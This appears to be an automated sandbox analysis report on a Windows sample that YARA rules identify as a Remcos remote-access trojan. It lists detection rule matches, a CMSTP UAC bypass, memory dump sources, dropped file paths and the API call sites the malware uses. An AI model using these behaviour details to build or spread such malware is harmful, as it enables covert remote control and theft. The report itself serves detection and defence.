                Source: Yara matchFile source: 1.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Allene.exe PID: 7132, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Allene.exe PID: 2872, type: MEMORYSTR

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 4.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.Allene.exe.3920000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.Allene.exe.3920000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Allene.exe.18b0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Allene.exe.18b0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1920045593.0000000001948000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4156569703.00000000012B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4156176304.0000000001058000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4157121061.0000000003DDE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4156339648.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Allene.exe PID: 7132, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Allene.exe PID: 2872, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0041BB71 SystemParametersInfoW,1_2_0041BB71
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0041BB77 SystemParametersInfoW,1_2_0041BB77

                System Summary

                barindex
                Source: 4.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 4.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 4.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 4.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 4.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 4.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 1.2.Allene.exe.3920000.2.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 1.2.Allene.exe.3920000.2.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 1.2.Allene.exe.3920000.2.unpack, type: UNPACKEDPE; Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 1.2.Allene.exe.3920000.2.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 1.2.Allene.exe.3920000.2.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 1.2.Allene.exe.3920000.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 4.2.Allene.exe.18b0000.2.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 4.2.Allene.exe.18b0000.2.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 4.2.Allene.exe.18b0000.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 1.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 1.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 1.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 4.2.Allene.exe.18b0000.2.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 4.2.Allene.exe.18b0000.2.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 4.2.Allene.exe.18b0000.2.unpack, type: UNPACKEDPE; Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 1.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 1.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 1.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: Process Memory Space: Allene.exe PID: 7132, type: MEMORYSTR; Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: Allene.exe PID: 2872, type: MEMORYSTR; Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: This is a third-party compiled AutoIt script. 0_2_00883B3A
                Source: 7056ZCiFdE.exe; String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: 7056ZCiFdE.exe, 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp; String found in binary or memory: This is a third-party compiled AutoIt script. memstr_5802f912-5
                Source: 7056ZCiFdE.exe, 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp; String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_e5fa5dba-5
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: This is a third-party compiled AutoIt script. 1_2_005D3B3A
                Source: Allene.exe; String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: Allene.exe, 00000001.00000002.4155616853.0000000000684000.00000040.00000001.01000000.00000004.sdmp; String found in binary or memory: This is a third-party compiled AutoIt script. memstr_3654c9d2-4
                Source: Allene.exe, 00000001.00000002.4155616853.0000000000684000.00000040.00000001.01000000.00000004.sdmp; String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_6f9caac4-8
                Source: Allene.exe, 00000004.00000002.1919469392.0000000000684000.00000040.00000001.01000000.00000004.sdmp; String found in binary or memory: This is a third-party compiled AutoIt script. memstr_64b6de13-5
                Source: Allene.exe, 00000004.00000002.1919469392.0000000000684000.00000040.00000001.01000000.00000004.sdmp; String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_880d2325-c
                Source: C:\Windows\System32\wscript.exe; COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Process Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_00883633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_0090C1AC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_0090C498 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_0090C5FE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_0090C57D SendMessageW,NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_0090C88F NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_0090C8BE NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_0090C860 NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_0090C909 NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_0090C93E ClientToScreen,NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_0090CABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_0090CA7C GetWindowLongW,NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_00881287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,745EC8D0,NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_00881290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_0090D3B8 NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_0090D43E GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_008816B5 NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_008816DE GetParent,NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_0088167D NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_0090D78C NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_0088189B NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_0090BC5D NtdllDialogWndProc_W,CallWindowProcW
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_0090BF8C ReleaseCapture,ChrCmpIA,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_0090BF30 NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_0041CA9E NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_005D3633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_0065C1AC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_0065C498 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_0065C57D SendMessageW,NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_0065C5FE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_0065C860 NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_0065C8BE NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_0065C88F NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_0065C93E ClientToScreen,NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_0065C909 NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_0065CA7C GetWindowLongW,NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_0065CABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_005D1290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_005D1287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,745EC8D0,NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_0065D3B8 NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_0065D43E GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_005D167D NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_005D16DE GetParent,NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_005D16B5 NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_0065D78C NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_005D189B NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_0065BC5D NtdllDialogWndProc_W,CallWindowProcW
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_0065BF30 NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_0065BF8C ReleaseCapture,ChrCmpIA,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_008EA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_008D8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74AF5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_008E51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_006351BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_0088E6A0
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_008AD975
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_0088FCE0
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_008A21C5
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_008B62D2
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_009003DA
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_008B242E
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_008A25FA
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_008966E1
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_008DE616
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_008B878F
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_008E8889
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_00898808
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_00900857
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_008B6844
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_008ACB21
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_008B6DB6
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_00896F9E
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_00893030
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_008A3187
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_008AF1D9
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_00881287
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_008A1484
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_00895520
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_008A7696
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_00895760
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_008A1978
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_008B9AB5
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_008A1D90
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_008ABDA6
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_00907DDB
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_00893FE0
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_0088DF00
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: 0_2_015FBF30
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_0041D071
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_004520D2
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_0043D098
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_00437150
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_004361AA
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_00426254
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_0043651C
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_0044C739
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_004367C6
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_004267CB
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_0043C9DD
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_00432A49
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_00436A8D
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_0043CC0C
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_00436D48
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_00434D22
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_00426E73
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_00440E20
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_0043CE3B
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_00412F45
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_00452F00
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_00426FAD
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_005DE6A0
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_005FD975
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_005DFCE0
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_005F21C5
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_006062D2
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_006503DA
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_0060242E
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_005F25FA
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_0062E616
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_005E66E1
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_0060878F
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_00606844
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_00650857
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_005E8808
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_00638889
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_005FCB21
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_00606DB6
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_005E6F9E
